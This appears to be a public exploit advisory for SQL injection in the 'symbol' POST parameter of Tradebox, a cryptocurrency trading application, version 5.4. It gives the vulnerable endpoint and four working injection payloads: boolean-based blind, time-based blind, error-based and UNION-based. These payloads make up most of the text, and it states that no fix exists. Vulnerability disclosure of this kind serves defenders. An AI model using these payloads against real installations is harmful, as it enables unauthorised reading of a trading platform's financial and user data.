Tradebox CryptoCurrency - 'symbol' SQL Injection

2019-04-08 15:05:12

# Title: Tradebox - CryptoCurrency Buy Sell and Trading
# Date: 04.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://www.bdtask.com
# Software Link: tradebox.bdtask.com/demo-v5.3/
# Version: 5.4
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
Tradebox – CryptoCurrency Buy Sell and Trading Software. Tradebox is for
the cryptocurrency trading and selling.even you can request for buy and
sell at a specific price. There have withdrawal and deposit option.

# Vulnerabilities:
# An attacker can access all data following an authorized user login using
the parameter.


# POC - SQLi :

# Parameter: symbol (POST)
# Request URL: http://localhost/backend/dashboard/home/monthly_deposit
# Type : boolean-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND 8149=8149
AND 'PuLt'='PuLt

# Type : time-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' OR (SELECT *
FROM (SELECT(SLEEP(5)))rBnp) AND 'wNyS'='wNyS

# Type : error-based
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND (SELECT
5276 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT
(ELT(5276=5276,1))),0x7171787171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CnKo'='CnKo

# Type : generic union
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' UNION ALL
SELECT
NULL,CONCAT(0x7162707671,0x75664d4466634a4d505554424d6d6a577957506a51534d734c6e7551516f436f71444e77796f4a63,0x7171787171)--
Lzbq

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.